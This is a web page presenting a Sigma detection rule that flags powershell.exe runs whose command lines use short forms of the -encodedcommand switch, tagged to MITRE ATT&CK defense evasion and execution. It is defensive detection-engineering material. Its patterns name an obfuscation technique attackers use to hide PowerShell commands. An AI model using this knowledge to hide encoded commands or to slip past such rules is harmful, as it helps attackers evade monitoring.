PowerShell -encodedcommand Switch

calendar Nov 29, 2022 · attack.defense_evasion attack.t1140 attack.execution attack.t1059.001  ·
Share on: linkedin copy

Looks for the execution of powershell.exe with command lines that include variations of the -encodedcommand argument. Inspired by the 2022 Red Canary Threat Detection report.

Sigma rule (View on GitHub)

 1title: PowerShell -encodedcommand Switch
 2id: 5c0fcaac-e5e9-44a3-811f-b43b7709c339
 3status: experimental
 4description: Looks for the execution of powershell.exe with command lines that include
 5    variations of the -encodedcommand argument. Inspired by the 2022 Red Canary Threat
 6    Detection report.
 7references:
 8    - https://redcanary.com/threat-detection-report/techniques/powershell/
 9author: Micah Babinski
10date: 2022/11/04
11tags:
12    - attack.defense_evasion
13    - attack.t1140
14    - attack.execution
15    - attack.t1059.001
16logsource:
17    category: process_creation
18    product: windows
19detection:
20    selection:
21        CommandLine|contains|windash:
22            - '-ec'
23            - '-en'
24            - '-enc'
25            - '-enco'
26        Image|endswith: '\powershell.exe'
27    condition: selection
28falsepositives:
29    - Windows Config Manager (https://wtfbins.wtf/1)
30level: high```

References

Related rules

to-top